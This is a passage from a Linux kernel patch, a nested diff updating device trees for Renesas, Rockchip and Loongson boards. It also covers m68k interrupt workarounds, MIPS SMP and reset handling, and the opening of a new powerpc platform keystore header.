+-		interrupts-extended = <&gic GIC_PPI 13 (GIC_CPU_MASK_SIMPLE(2) | IRQ_TYPE_LEVEL_LOW)>,
+-				      <&gic GIC_PPI 14 (GIC_CPU_MASK_SIMPLE(2) | IRQ_TYPE_LEVEL_LOW)>,
+-				      <&gic GIC_PPI 11 (GIC_CPU_MASK_SIMPLE(2) | IRQ_TYPE_LEVEL_LOW)>,
+-				      <&gic GIC_PPI 10 (GIC_CPU_MASK_SIMPLE(2) | IRQ_TYPE_LEVEL_LOW)>;
++		interrupts-extended = <&gic GIC_PPI 13 IRQ_TYPE_LEVEL_LOW>,
++				      <&gic GIC_PPI 14 IRQ_TYPE_LEVEL_LOW>,
++				      <&gic GIC_PPI 11 IRQ_TYPE_LEVEL_LOW>,
++				      <&gic GIC_PPI 10 IRQ_TYPE_LEVEL_LOW>,
++				      <&gic GIC_PPI 12 IRQ_TYPE_LEVEL_LOW>;
++		interrupt-names = "sec-phys", "phys", "virt", "hyp-phys",
++				  "hyp-virt";
+ 	};
+ };
+diff --git a/arch/arm64/boot/dts/renesas/r9a07g044c1.dtsi b/arch/arm64/boot/dts/renesas/r9a07g044c1.dtsi
+index 1d57df706939c..56a979e82c4f1 100644
+--- a/arch/arm64/boot/dts/renesas/r9a07g044c1.dtsi
++++ b/arch/arm64/boot/dts/renesas/r9a07g044c1.dtsi
+@@ -15,13 +15,6 @@ cpus {
+ 		/delete-node/ cpu-map;
+ 		/delete-node/ cpu@100;
+ 	};
+-
+-	timer {
+-		interrupts-extended = <&gic GIC_PPI 13 (GIC_CPU_MASK_SIMPLE(1) | IRQ_TYPE_LEVEL_LOW)>,
+-				      <&gic GIC_PPI 14 (GIC_CPU_MASK_SIMPLE(1) | IRQ_TYPE_LEVEL_LOW)>,
+-				      <&gic GIC_PPI 11 (GIC_CPU_MASK_SIMPLE(1) | IRQ_TYPE_LEVEL_LOW)>,
+-				      <&gic GIC_PPI 10 (GIC_CPU_MASK_SIMPLE(1) | IRQ_TYPE_LEVEL_LOW)>;
+-	};
+ };
+ 
+ &soc {
+diff --git a/arch/arm64/boot/dts/renesas/r9a07g044l1.dtsi b/arch/arm64/boot/dts/renesas/r9a07g044l1.dtsi
+index 9d89d4590358e..9cf27ca9f1d2a 100644
+--- a/arch/arm64/boot/dts/renesas/r9a07g044l1.dtsi
++++ b/arch/arm64/boot/dts/renesas/r9a07g044l1.dtsi
+@@ -15,11 +15,4 @@ cpus {
+ 		/delete-node/ cpu-map;
+ 		/delete-node/ cpu@100;
+ 	};
+-
+-	timer {
+-		interrupts-extended = <&gic GIC_PPI 13 (GIC_CPU_MASK_SIMPLE(1) | IRQ_TYPE_LEVEL_LOW)>,
+-				      <&gic GIC_PPI 14 (GIC_CPU_MASK_SIMPLE(1) | IRQ_TYPE_LEVEL_LOW)>,
+-				      <&gic GIC_PPI 11 (GIC_CPU_MASK_SIMPLE(1) | IRQ_TYPE_LEVEL_LOW)>,
+-				      <&gic GIC_PPI 10 (GIC_CPU_MASK_SIMPLE(1) | IRQ_TYPE_LEVEL_LOW)>;
+-	};
+ };
+diff --git a/arch/arm64/boot/dts/renesas/r9a07g054.dtsi b/arch/arm64/boot/dts/renesas/r9a07g054.dtsi
+index b3d37ca942ee3..60a20a3ca12e3 100644
+--- a/arch/arm64/boot/dts/renesas/r9a07g054.dtsi
++++ b/arch/arm64/boot/dts/renesas/r9a07g054.dtsi
+@@ -1097,9 +1097,12 @@ target: trip-point {
+ 
+ 	timer {
+ 		compatible = "arm,armv8-timer";
+-		interrupts-extended = <&gic GIC_PPI 13 (GIC_CPU_MASK_SIMPLE(2) | IRQ_TYPE_LEVEL_LOW)>,
+-				      <&gic GIC_PPI 14 (GIC_CPU_MASK_SIMPLE(2) | IRQ_TYPE_LEVEL_LOW)>,
+-				      <&gic GIC_PPI 11 (GIC_CPU_MASK_SIMPLE(2) | IRQ_TYPE_LEVEL_LOW)>,
+-				      <&gic GIC_PPI 10 (GIC_CPU_MASK_SIMPLE(2) | IRQ_TYPE_LEVEL_LOW)>;
++		interrupts-extended = <&gic GIC_PPI 13 IRQ_TYPE_LEVEL_LOW>,
++				      <&gic GIC_PPI 14 IRQ_TYPE_LEVEL_LOW>,
++				      <&gic GIC_PPI 11 IRQ_TYPE_LEVEL_LOW>,
++				      <&gic GIC_PPI 10 IRQ_TYPE_LEVEL_LOW>,
++				      <&gic GIC_PPI 12 IRQ_TYPE_LEVEL_LOW>;
++		interrupt-names = "sec-phys", "phys", "virt", "hyp-phys",
++				  "hyp-virt";
+ 	};
+ };
+diff --git a/arch/arm64/boot/dts/renesas/r9a07g054l1.dtsi b/arch/arm64/boot/dts/renesas/r9a07g054l1.dtsi
+index c448cc6634c1a..d85a6ac0f0245 100644
+--- a/arch/arm64/boot/dts/renesas/r9a07g054l1.dtsi
++++ b/arch/arm64/boot/dts/renesas/r9a07g054l1.dtsi
+@@ -15,11 +15,4 @@ cpus {
+ 		/delete-node/ cpu-map;
+ 		/delete-node/ cpu@100;
+ 	};
+-
+-	timer {
+-		interrupts-extended = <&gic GIC_PPI 13 (GIC_CPU_MASK_SIMPLE(1) | IRQ_TYPE_LEVEL_LOW)>,
+-				      <&gic GIC_PPI 14 (GIC_CPU_MASK_SIMPLE(1) | IRQ_TYPE_LEVEL_LOW)>,
+-				      <&gic GIC_PPI 11 (GIC_CPU_MASK_SIMPLE(1) | IRQ_TYPE_LEVEL_LOW)>,
+-				      <&gic GIC_PPI 10 (GIC_CPU_MASK_SIMPLE(1) | IRQ_TYPE_LEVEL_LOW)>;
+-	};
+ };
+diff --git a/arch/arm64/boot/dts/rockchip/rk3308-rock-pi-s.dts b/arch/arm64/boot/dts/rockchip/rk3308-rock-pi-s.dts
+index edc8d2e3980d0..bc9e98fe0f013 100644
+--- a/arch/arm64/boot/dts/rockchip/rk3308-rock-pi-s.dts
++++ b/arch/arm64/boot/dts/rockchip/rk3308-rock-pi-s.dts
+@@ -17,6 +17,7 @@ aliases {
+ 		ethernet0 = &gmac;
+ 		mmc0 = &emmc;
+ 		mmc1 = &sdmmc;
++		mmc2 = &sdio;
+ 	};
+ 
+ 	chosen {
+@@ -145,11 +146,25 @@ &emmc {
+ 
+ &gmac {
+ 	clock_in_out = "output";
++	phy-handle = <&rtl8201f>;
+ 	phy-supply = <&vcc_io>;
+-	snps,reset-gpio = <&gpio0 RK_PA7 GPIO_ACTIVE_LOW>;
+-	snps,reset-active-low;
+-	snps,reset-delays-us = <0 50000 50000>;
+ 	status = "okay";
++
++	mdio {
++		compatible = "snps,dwmac-mdio";
++		#address-cells = <1>;
++		#size-cells = <0>;
++
++		rtl8201f: ethernet-phy@1 {
++			compatible = "ethernet-phy-ieee802.3-c22";
++			reg = <1>;
++			pinctrl-names = "default";
++			pinctrl-0 = <&mac_rst>;
++			reset-assert-us = <20000>;
++			reset-deassert-us = <50000>;
++			reset-gpios = <&gpio0 RK_PA7 GPIO_ACTIVE_LOW>;
++		};
++	};
+ };
+ 
+ &i2c1 {
+@@ -160,6 +175,26 @@ &pinctrl {
+ 	pinctrl-names = "default";
+ 	pinctrl-0 = <&rtc_32k>;
+ 
++	bluetooth {
++		bt_reg_on: bt-reg-on {
++			rockchip,pins = <4 RK_PB3 RK_FUNC_GPIO &pcfg_pull_none>;
++		};
++
++		bt_wake_host: bt-wake-host {
++			rockchip,pins = <4 RK_PB4 RK_FUNC_GPIO &pcfg_pull_down>;
++		};
++
++		host_wake_bt: host-wake-bt {
++			rockchip,pins = <4 RK_PB2 RK_FUNC_GPIO &pcfg_pull_none>;
++		};
++	};
++
++	gmac {
++		mac_rst: mac-rst {
++			rockchip,pins = <0 RK_PA7 RK_FUNC_GPIO &pcfg_pull_none>;
++		};
++	};
++
+ 	leds {
+ 		green_led: green-led {
+ 			rockchip,pins = <0 RK_PA6 RK_FUNC_GPIO &pcfg_pull_none>;
+@@ -203,15 +238,31 @@ &sdio {
+ 	cap-sd-highspeed;
+ 	cap-sdio-irq;
+ 	keep-power-in-suspend;
+-	max-frequency = <1000000>;
++	max-frequency = <100000000>;
+ 	mmc-pwrseq = <&sdio_pwrseq>;
++	no-mmc;
++	no-sd;
+ 	non-removable;
+-	sd-uhs-sdr104;
++	sd-uhs-sdr50;
++	vmmc-supply = <&vcc_io>;
++	vqmmc-supply = <&vcc_1v8>;
+ 	status = "okay";
++
++	rtl8723ds: wifi@1 {
++		reg = <1>;
++		interrupt-parent = <&gpio0>;
++		interrupts = <RK_PA0 IRQ_TYPE_LEVEL_HIGH>;
++		interrupt-names = "host-wake";
++		pinctrl-names = "default";
++		pinctrl-0 = <&wifi_host_wake>;
++	};
+ };
+ 
+ &sdmmc {
++	cap-mmc-highspeed;
+ 	cap-sd-highspeed;
++	disable-wp;
++	vmmc-supply = <&vcc_io>;
+ 	status = "okay";
+ };
+ 
+@@ -230,16 +281,22 @@ u2phy_otg: otg-port {
+ };
+ 
+ &uart0 {
++	pinctrl-names = "default";
++	pinctrl-0 = <&uart0_xfer>;
+ 	status = "okay";
+ };
+ 
+ &uart4 {
++	uart-has-rtscts;
+ 	status = "okay";
+ 
+ 	bluetooth {
+-		compatible = "realtek,rtl8723bs-bt";
+-		device-wake-gpios = <&gpio4 RK_PB3 GPIO_ACTIVE_HIGH>;
++		compatible = "realtek,rtl8723ds-bt";
++		device-wake-gpios = <&gpio4 RK_PB2 GPIO_ACTIVE_HIGH>;
++		enable-gpios = <&gpio4 RK_PB3 GPIO_ACTIVE_HIGH>;
+ 		host-wake-gpios = <&gpio4 RK_PB4 GPIO_ACTIVE_HIGH>;
++		pinctrl-names = "default";
++		pinctrl-0 = <&bt_reg_on &bt_wake_host &host_wake_bt>;
+ 	};
+ };
+ 
+diff --git a/arch/arm64/boot/dts/rockchip/rk3328.dtsi b/arch/arm64/boot/dts/rockchip/rk3328.dtsi
+index d42846efff2fe..5adb2fbc2aafa 100644
+--- a/arch/arm64/boot/dts/rockchip/rk3328.dtsi
++++ b/arch/arm64/boot/dts/rockchip/rk3328.dtsi
+@@ -820,8 +820,8 @@ cru: clock-controller@ff440000 {
+ 			<0>, <24000000>,
+ 			<24000000>, <24000000>,
+ 			<15000000>, <15000000>,
+-			<100000000>, <100000000>,
+-			<100000000>, <100000000>,
++			<300000000>, <100000000>,
++			<400000000>, <100000000>,
+ 			<50000000>, <100000000>,
+ 			<100000000>, <100000000>,
+ 			<50000000>, <50000000>,
+diff --git a/arch/arm64/boot/dts/rockchip/rk3568-evb1-v10.dts b/arch/arm64/boot/dts/rockchip/rk3568-evb1-v10.dts
+index 674792567fa6e..4fc8354e069a7 100644
+--- a/arch/arm64/boot/dts/rockchip/rk3568-evb1-v10.dts
++++ b/arch/arm64/boot/dts/rockchip/rk3568-evb1-v10.dts
+@@ -478,7 +478,7 @@ regulator-state-mem {
+ 		};
+ 
+ 		codec {
+-			mic-in-differential;
++			rockchip,mic-in-differential;
+ 		};
+ 	};
+ };
+diff --git a/arch/arm64/boot/dts/rockchip/rk3568-rock-3a.dts b/arch/arm64/boot/dts/rockchip/rk3568-rock-3a.dts
+index bab46db2b18cd..478620c782599 100644
+--- a/arch/arm64/boot/dts/rockchip/rk3568-rock-3a.dts
++++ b/arch/arm64/boot/dts/rockchip/rk3568-rock-3a.dts
+@@ -481,10 +481,6 @@ regulator-state-mem {
+ 				};
+ 			};
+ 		};
+-
+-		codec {
+-			mic-in-differential;
+-		};
+ 	};
+ };
+ 
+diff --git a/arch/arm64/boot/dts/rockchip/rk356x.dtsi b/arch/arm64/boot/dts/rockchip/rk356x.dtsi
+index 99ad6fc51b584..e5c88f0007253 100644
+--- a/arch/arm64/boot/dts/rockchip/rk356x.dtsi
++++ b/arch/arm64/boot/dts/rockchip/rk356x.dtsi
+@@ -737,6 +737,7 @@ vop_mmu: iommu@fe043e00 {
+ 		clocks = <&cru ACLK_VOP>, <&cru HCLK_VOP>;
+ 		clock-names = "aclk", "iface";
+ 		#iommu-cells = <0>;
++		power-domains = <&power RK3568_PD_VO>;
+ 		status = "disabled";
+ 	};
+ 
+diff --git a/arch/m68k/amiga/config.c b/arch/m68k/amiga/config.c
+index 3137b45750dfc..b7cb28f5ee290 100644
+--- a/arch/m68k/amiga/config.c
++++ b/arch/m68k/amiga/config.c
+@@ -180,6 +180,15 @@ int __init amiga_parse_bootinfo(const struct bi_record *record)
+ 			dev->slotsize = be16_to_cpu(cd->cd_SlotSize);
+ 			dev->boardaddr = be32_to_cpu(cd->cd_BoardAddr);
+ 			dev->boardsize = be32_to_cpu(cd->cd_BoardSize);
++
++			/* CS-LAB Warp 1260 workaround */
++			if (be16_to_cpu(dev->rom.er_Manufacturer) == ZORRO_MANUF(ZORRO_PROD_CSLAB_WARP_1260) &&
++			    dev->rom.er_Product == ZORRO_PROD(ZORRO_PROD_CSLAB_WARP_1260)) {
++
++				/* turn off all interrupts */
++				pr_info("Warp 1260 card detected: applying interrupt storm workaround\n");
++				*(uint32_t *)(dev->boardaddr + 0x1000) = 0xfff;
++			}
+ 		} else
+ 			pr_warn("amiga_parse_bootinfo: too many AutoConfig devices\n");
+ #endif /* CONFIG_ZORRO */
+diff --git a/arch/m68k/atari/ataints.c b/arch/m68k/atari/ataints.c
+index 56f02ea2c248d..715d1e0d973e6 100644
+--- a/arch/m68k/atari/ataints.c
++++ b/arch/m68k/atari/ataints.c
+@@ -302,11 +302,7 @@ void __init atari_init_IRQ(void)
+ 
+ 	if (ATARIHW_PRESENT(SCU)) {
+ 		/* init the SCU if present */
+-		tt_scu.sys_mask = 0x10;		/* enable VBL (for the cursor) and
+-									 * disable HSYNC interrupts (who
+-									 * needs them?)  MFP and SCC are
+-									 * enabled in VME mask
+-									 */
++		tt_scu.sys_mask = 0x0;		/* disable all interrupts */
+ 		tt_scu.vme_mask = 0x60;		/* enable MFP and SCC ints */
+ 	} else {
+ 		/* If no SCU and no Hades, the HSYNC interrupt needs to be
+diff --git a/arch/m68k/include/asm/cmpxchg.h b/arch/m68k/include/asm/cmpxchg.h
+index 6cf464cdab067..694a44a5c3b05 100644
+--- a/arch/m68k/include/asm/cmpxchg.h
++++ b/arch/m68k/include/asm/cmpxchg.h
+@@ -32,7 +32,7 @@ static inline unsigned long __xchg(unsigned long x, volatile void * ptr, int siz
+ 		x = tmp;
+ 		break;
+ 	default:
+-		tmp = __invalid_xchg_size(x, ptr, size);
++		x = __invalid_xchg_size(x, ptr, size);
+ 		break;
+ 	}
+ 
+diff --git a/arch/mips/boot/dts/loongson/loongson64-2k1000.dtsi b/arch/mips/boot/dts/loongson/loongson64-2k1000.dtsi
+index c16b521308cb1..9089d1e4f3fee 100644
+--- a/arch/mips/boot/dts/loongson/loongson64-2k1000.dtsi
++++ b/arch/mips/boot/dts/loongson/loongson64-2k1000.dtsi
+@@ -23,14 +23,6 @@ cpu0: cpu@0 {
+ 		};
+ 	};
+ 
+-	memory@200000 {
+-		compatible = "memory";
+-		device_type = "memory";
+-		reg = <0x00000000 0x00200000 0x00000000 0x0ee00000>, /* 238 MB at 2 MB */
+-			<0x00000000 0x20000000 0x00000000 0x1f000000>, /* 496 MB at 512 MB */
+-			<0x00000001 0x10000000 0x00000001 0xb0000000>; /* 6912 MB at 4352MB */
+-	};
+-
+ 	cpu_clk: cpu_clk {
+ 		#clock-cells = <0>;
+ 		compatible = "fixed-clock";
+@@ -52,6 +44,13 @@ package0: bus@10000000 {
+ 			0 0x40000000 0 0x40000000 0 0x40000000
+ 			0xfe 0x00000000 0xfe 0x00000000 0 0x40000000>;
+ 
++		isa@18000000 {
++			compatible = "isa";
++			#size-cells = <1>;
++			#address-cells = <2>;
++			ranges = <1 0x0 0x0 0x18000000 0x4000>;
++		};
++
+ 		pm: reset-controller@1fe07000 {
+ 			compatible = "loongson,ls2k-pm";
+ 			reg = <0 0x1fe07000 0 0x422>;
+@@ -130,7 +129,8 @@ gmac@3,0 {
+ 					     <13 IRQ_TYPE_LEVEL_LOW>;
+ 				interrupt-names = "macirq", "eth_lpi";
+ 				interrupt-parent = <&liointc0>;
+-				phy-mode = "rgmii";
++				phy-mode = "rgmii-id";
++				phy-handle = <&phy1>;
+ 				mdio {
+ 					#address-cells = <1>;
+ 					#size-cells = <0>;
+@@ -153,7 +153,8 @@ gmac@3,1 {
+ 					     <15 IRQ_TYPE_LEVEL_LOW>;
+ 				interrupt-names = "macirq", "eth_lpi";
+ 				interrupt-parent = <&liointc0>;
+-				phy-mode = "rgmii";
++				phy-mode = "rgmii-id";
++				phy-handle = <&phy1>;
+ 				mdio {
+ 					#address-cells = <1>;
+ 					#size-cells = <0>;
+diff --git a/arch/mips/include/asm/mach-loongson64/boot_param.h b/arch/mips/include/asm/mach-loongson64/boot_param.h
+index e007edd6b60a7..9218b3ae33832 100644
+--- a/arch/mips/include/asm/mach-loongson64/boot_param.h
++++ b/arch/mips/include/asm/mach-loongson64/boot_param.h
+@@ -42,12 +42,14 @@ enum loongson_cpu_type {
+ 	Legacy_1B = 0x5,
+ 	Legacy_2G = 0x6,
+ 	Legacy_2H = 0x7,
++	Legacy_2K = 0x8,
+ 	Loongson_1A = 0x100,
+ 	Loongson_1B = 0x101,
+ 	Loongson_2E = 0x200,
+ 	Loongson_2F = 0x201,
+ 	Loongson_2G = 0x202,
+ 	Loongson_2H = 0x203,
++	Loongson_2K = 0x204,
+ 	Loongson_3A = 0x300,
+ 	Loongson_3B = 0x301
+ };
+diff --git a/arch/mips/include/asm/mips-cm.h b/arch/mips/include/asm/mips-cm.h
+index 23c67c0871b17..696b40beb774f 100644
+--- a/arch/mips/include/asm/mips-cm.h
++++ b/arch/mips/include/asm/mips-cm.h
+@@ -228,6 +228,10 @@ GCR_ACCESSOR_RO(32, 0x0d0, gic_status)
+ GCR_ACCESSOR_RO(32, 0x0f0, cpc_status)
+ #define CM_GCR_CPC_STATUS_EX			BIT(0)
+ 
++/* GCR_ACCESS - Controls core/IOCU access to GCRs */
++GCR_ACCESSOR_RW(32, 0x120, access_cm3)
++#define CM_GCR_ACCESS_ACCESSEN			GENMASK(7, 0)
++
+ /* GCR_L2_CONFIG - Indicates L2 cache configuration when Config5.L2C=1 */
+ GCR_ACCESSOR_RW(32, 0x130, l2_config)
+ #define CM_GCR_L2_CONFIG_BYPASS			BIT(20)
+diff --git a/arch/mips/kernel/smp-cps.c b/arch/mips/kernel/smp-cps.c
+index bcd6a944b8397..739997e6fd655 100644
+--- a/arch/mips/kernel/smp-cps.c
++++ b/arch/mips/kernel/smp-cps.c
+@@ -230,7 +230,10 @@ static void boot_core(unsigned int core, unsigned int vpe_id)
+ 	write_gcr_co_reset_ext_base(CM_GCR_Cx_RESET_EXT_BASE_UEB);
+ 
+ 	/* Ensure the core can access the GCRs */
+-	set_gcr_access(1 << core);
++	if (mips_cm_revision() < CM_REV_CM3)
++		set_gcr_access(1 << core);
++	else
++		set_gcr_access_cm3(1 << core);
+ 
+ 	if (mips_cpc_present()) {
+ 		/* Reset the core */
+diff --git a/arch/mips/loongson64/env.c b/arch/mips/loongson64/env.c
+index ef3750a6ffacf..09ff052698614 100644
+--- a/arch/mips/loongson64/env.c
++++ b/arch/mips/loongson64/env.c
+@@ -88,6 +88,12 @@ void __init prom_lefi_init_env(void)
+ 	cpu_clock_freq = ecpu->cpu_clock_freq;
+ 	loongson_sysconf.cputype = ecpu->cputype;
+ 	switch (ecpu->cputype) {
++	case Legacy_2K:
++	case Loongson_2K:
++		smp_group[0] = 0x900000001fe11000;
++		loongson_sysconf.cores_per_node = 2;
++		loongson_sysconf.cores_per_package = 2;
++		break;
+ 	case Legacy_3A:
+ 	case Loongson_3A:
+ 		loongson_sysconf.cores_per_node = 4;
+@@ -221,6 +227,8 @@ void __init prom_lefi_init_env(void)
+ 		default:
+ 			break;
+ 		}
++	} else if ((read_c0_prid() & PRID_IMP_MASK) == PRID_IMP_LOONGSON_64R) {
++		loongson_fdt_blob = __dtb_loongson64_2core_2k1000_begin;
+ 	} else if ((read_c0_prid() & PRID_IMP_MASK) == PRID_IMP_LOONGSON_64G) {
+ 		if (loongson_sysconf.bridgetype == LS7A)
+ 			loongson_fdt_blob = __dtb_loongson64g_4core_ls7a_begin;
+diff --git a/arch/mips/loongson64/reset.c b/arch/mips/loongson64/reset.c
+index e420800043b08..2a8e4cd72605d 100644
+--- a/arch/mips/loongson64/reset.c
++++ b/arch/mips/loongson64/reset.c
+@@ -11,6 +11,7 @@
+ #include <linux/init.h>
+ #include <linux/kexec.h>
+ #include <linux/pm.h>
++#include <linux/reboot.h>
+ #include <linux/slab.h>
+ 
+ #include <asm/bootinfo.h>
+@@ -21,36 +22,21 @@
+ #include <loongson.h>
+ #include <boot_param.h>
+ 
+-static void loongson_restart(char *command)
++static int firmware_restart(struct sys_off_data *unusedd)
+ {
+ 
+ 	void (*fw_restart)(void) = (void *)loongson_sysconf.restart_addr;
+ 
+ 	fw_restart();
+-	while (1) {
+-		if (cpu_wait)
+-			cpu_wait();
+-	}
++	return NOTIFY_DONE;
+ }
+ 
+-static void loongson_poweroff(void)
++static int firmware_poweroff(struct sys_off_data *unused)
+ {
+ 	void (*fw_poweroff)(void) = (void *)loongson_sysconf.poweroff_addr;
+ 
+ 	fw_poweroff();
+-	while (1) {
+-		if (cpu_wait)
+-			cpu_wait();
+-	}
+-}
+-
+-static void loongson_halt(void)
+-{
+-	pr_notice("\n\n** You can safely turn off the power now **\n\n");
+-	while (1) {
+-		if (cpu_wait)
+-			cpu_wait();
+-	}
++	return NOTIFY_DONE;
+ }
+ 
+ #ifdef CONFIG_KEXEC
+@@ -154,9 +140,17 @@ static void loongson_crash_shutdown(struct pt_regs *regs)
+ 
+ static int __init mips_reboot_setup(void)
+ {
+-	_machine_restart = loongson_restart;
+-	_machine_halt = loongson_halt;
+-	pm_power_off = loongson_poweroff;
++	if (loongson_sysconf.restart_addr) {
++		register_sys_off_handler(SYS_OFF_MODE_RESTART,
++				 SYS_OFF_PRIO_FIRMWARE,
++				 firmware_restart, NULL);
++	}
++
++	if (loongson_sysconf.poweroff_addr) {
++		register_sys_off_handler(SYS_OFF_MODE_POWER_OFF,
++				 SYS_OFF_PRIO_FIRMWARE,
++				 firmware_poweroff, NULL);
++	}
+ 
+ #ifdef CONFIG_KEXEC
+ 	kexec_argv = kmalloc(KEXEC_ARGV_SIZE, GFP_KERNEL);
+diff --git a/arch/mips/loongson64/smp.c b/arch/mips/loongson64/smp.c
+index 660e1de4412a1..52dc959957838 100644
+--- a/arch/mips/loongson64/smp.c
++++ b/arch/mips/loongson64/smp.c
+@@ -479,12 +479,25 @@ static void loongson3_smp_finish(void)
+ static void __init loongson3_smp_setup(void)
+ {
+ 	int i = 0, num = 0; /* i: physical id, num: logical id */
++	int max_cpus = 0;
+ 
+ 	init_cpu_possible(cpu_none_mask);
+ 
++	for (i = 0; i < ARRAY_SIZE(smp_group); i++) {
++		if (!smp_group[i])
++			break;
++		max_cpus += loongson_sysconf.cores_per_node;
++	}
++
++	if (max_cpus < loongson_sysconf.nr_cpus) {
++		pr_err("SMP Groups are less than the number of CPUs\n");
++		loongson_sysconf.nr_cpus = max_cpus ? max_cpus : 1;
++	}
++
+ 	/* For unified kernel, NR_CPUS is the maximum possible value,
+ 	 * loongson_sysconf.nr_cpus is the really present value
+ 	 */
++	i = 0;
+ 	while (i < loongson_sysconf.nr_cpus) {
+ 		if (loongson_sysconf.reserved_cpus_mask & (1<<i)) {
+ 			/* Reserved physical CPU cores */
+@@ -505,14 +518,14 @@ static void __init loongson3_smp_setup(void)
+ 		__cpu_logical_map[num] = -1;
+ 		num++;
+ 	}
+-
+ 	csr_ipi_probe();
+ 	ipi_set0_regs_init();
+ 	ipi_clear0_regs_init();
+ 	ipi_status0_regs_init();
+ 	ipi_en0_regs_init();
+ 	ipi_mailbox_buf_init();
+-	ipi_write_enable(0);
++	if (smp_group[0])
++		ipi_write_enable(0);
+ 
+ 	cpu_set_core(&cpu_data[0],
+ 		     cpu_logical_map(0) % loongson_sysconf.cores_per_package);
+@@ -829,6 +842,9 @@ static int loongson3_disable_clock(unsigned int cpu)
+ 	uint64_t core_id = cpu_core(&cpu_data[cpu]);
+ 	uint64_t package_id = cpu_data[cpu].package;
+ 
++	if (!loongson_chipcfg[package_id] || !loongson_freqctrl[package_id])
++		return 0;
++
+ 	if ((read_c0_prid() & PRID_REV_MASK) == PRID_REV_LOONGSON3A_R1) {
+ 		LOONGSON_CHIPCFG(package_id) &= ~(1 << (12 + core_id));
+ 	} else {
+@@ -843,6 +859,9 @@ static int loongson3_enable_clock(unsigned int cpu)
+ 	uint64_t core_id = cpu_core(&cpu_data[cpu]);
+ 	uint64_t package_id = cpu_data[cpu].package;
+ 
++	if (!loongson_chipcfg[package_id] || !loongson_freqctrl[package_id])
++		return 0;
++
+ 	if ((read_c0_prid() & PRID_REV_MASK) == PRID_REV_LOONGSON3A_R1) {
+ 		LOONGSON_CHIPCFG(package_id) |= 1 << (12 + core_id);
+ 	} else {
+diff --git a/arch/mips/pci/pcie-octeon.c b/arch/mips/pci/pcie-octeon.c
+old mode 100755
+new mode 100644
+diff --git a/arch/mips/sgi-ip30/ip30-console.c b/arch/mips/sgi-ip30/ip30-console.c
+index b91f8c4fdc786..a087b7ebe1293 100644
+--- a/arch/mips/sgi-ip30/ip30-console.c
++++ b/arch/mips/sgi-ip30/ip30-console.c
+@@ -1,6 +1,7 @@
+ // SPDX-License-Identifier: GPL-2.0
+ 
+ #include <linux/io.h>
++#include <linux/processor.h>
+ 
+ #include <asm/sn/ioc3.h>
+ 
+diff --git a/arch/parisc/Kconfig b/arch/parisc/Kconfig
+index 5762633ea95e4..3341d4a421990 100644
+--- a/arch/parisc/Kconfig
++++ b/arch/parisc/Kconfig
+@@ -75,6 +75,7 @@ config PARISC
+ 	select HAVE_SOFTIRQ_ON_OWN_STACK if IRQSTACKS
+ 	select TRACE_IRQFLAGS_SUPPORT
+ 	select HAVE_FUNCTION_DESCRIPTORS if 64BIT
++	select PCI_MSI_ARCH_FALLBACKS if PCI_MSI
+ 
+ 	help
+ 	  The PA-RISC microprocessor is designed by Hewlett-Packard and used
+diff --git a/arch/powerpc/configs/85xx-hw.config b/arch/powerpc/configs/85xx-hw.config
+index 524db76f47b73..8aff832173977 100644
+--- a/arch/powerpc/configs/85xx-hw.config
++++ b/arch/powerpc/configs/85xx-hw.config
+@@ -24,6 +24,7 @@ CONFIG_FS_ENET=y
+ CONFIG_FSL_CORENET_CF=y
+ CONFIG_FSL_DMA=y
+ CONFIG_FSL_HV_MANAGER=y
++CONFIG_FSL_IFC=y
+ CONFIG_FSL_PQ_MDIO=y
+ CONFIG_FSL_RIO=y
+ CONFIG_FSL_XGMAC_MDIO=y
+@@ -58,6 +59,7 @@ CONFIG_INPUT_FF_MEMLESS=m
+ CONFIG_MARVELL_PHY=y
+ CONFIG_MDIO_BUS_MUX_GPIO=y
+ CONFIG_MDIO_BUS_MUX_MMIOREG=y
++CONFIG_MEMORY=y
+ CONFIG_MMC_SDHCI_OF_ESDHC=y
+ CONFIG_MMC_SDHCI_PLTFM=y
+ CONFIG_MMC_SDHCI=y
+diff --git a/arch/powerpc/include/asm/kexec.h b/arch/powerpc/include/asm/kexec.h
+index a1ddba01e7d13..f2db1b443920e 100644
+--- a/arch/powerpc/include/asm/kexec.h
++++ b/arch/powerpc/include/asm/kexec.h
+@@ -181,6 +181,10 @@ static inline void crash_send_ipi(void (*crash_ipi_callback)(struct pt_regs *))
+ 
+ #endif /* CONFIG_KEXEC_CORE */
+ 
++#if defined(CONFIG_KEXEC_FILE) || defined(CONFIG_CRASH_DUMP)
++int update_cpus_node(void *fdt);
++#endif
++
+ #ifdef CONFIG_PPC_BOOK3S_64
+ #include <asm/book3s/64/kexec.h>
+ #endif
+diff --git a/arch/powerpc/include/asm/plpks.h b/arch/powerpc/include/asm/plpks.h
+new file mode 100644
+index 0000000000000..9e2219b0202db
+--- /dev/null
++++ b/arch/powerpc/include/asm/plpks.h
+@@ -0,0 +1,163 @@
++/* SPDX-License-Identifier: GPL-2.0 */
++/*
++ * Copyright (C) 2022 IBM Corporation
++ * Author: Nayna Jain <nayna@linux.ibm.com>
++ *
++ * Platform keystore for pseries LPAR(PLPKS).
++ */
++
++#ifndef _ASM_POWERPC_PLPKS_H
++#define _ASM_POWERPC_PLPKS_H
++
++#ifdef CONFIG_PSERIES_PLPKS
++
++#include <linux/types.h>
++#include <linux/list.h>
++
++// Object policy flags from supported_policies
++#define PLPKS_OSSECBOOTAUDIT	PPC_BIT32(1) // OS secure boot must be audit/enforce
++#define PLPKS_OSSECBOOTENFORCE	PPC_BIT32(2) // OS secure boot must be enforce
++#define PLPKS_PWSET		PPC_BIT32(3) // No access without password set
++#define PLPKS_WORLDREADABLE	PPC_BIT32(4) // Readable without authentication
++#define PLPKS_IMMUTABLE		PPC_BIT32(5) // Once written, object cannot be removed
++#define PLPKS_TRANSIENT		PPC_BIT32(6) // Object does not persist through reboot
++#define PLPKS_SIGNEDUPDATE	PPC_BIT32(7) // Object can only be modified by signed updates
++#define PLPKS_HVPROVISIONED	PPC_BIT32(28) // Hypervisor has provisioned this object
++
++// Signature algorithm flags from signed_update_algorithms
++#define PLPKS_ALG_RSA2048	PPC_BIT(0)
++#define PLPKS_ALG_RSA4096	PPC_BIT(1)
++
++// Object label OS metadata flags
++#define PLPKS_VAR_LINUX		0x02
++#define PLPKS_VAR_COMMON	0x04
++
++// Flags for which consumer owns an object is owned by
++#define PLPKS_FW_OWNER			0x1
++#define PLPKS_BOOTLOADER_OWNER		0x2
++#define PLPKS_OS_OWNER			0x3
++
++// Flags for label metadata fields
++#define PLPKS_LABEL_VERSION		0
++#define PLPKS_MAX_LABEL_ATTR_SIZE	16
++#define PLPKS_MAX_NAME_SIZE		239
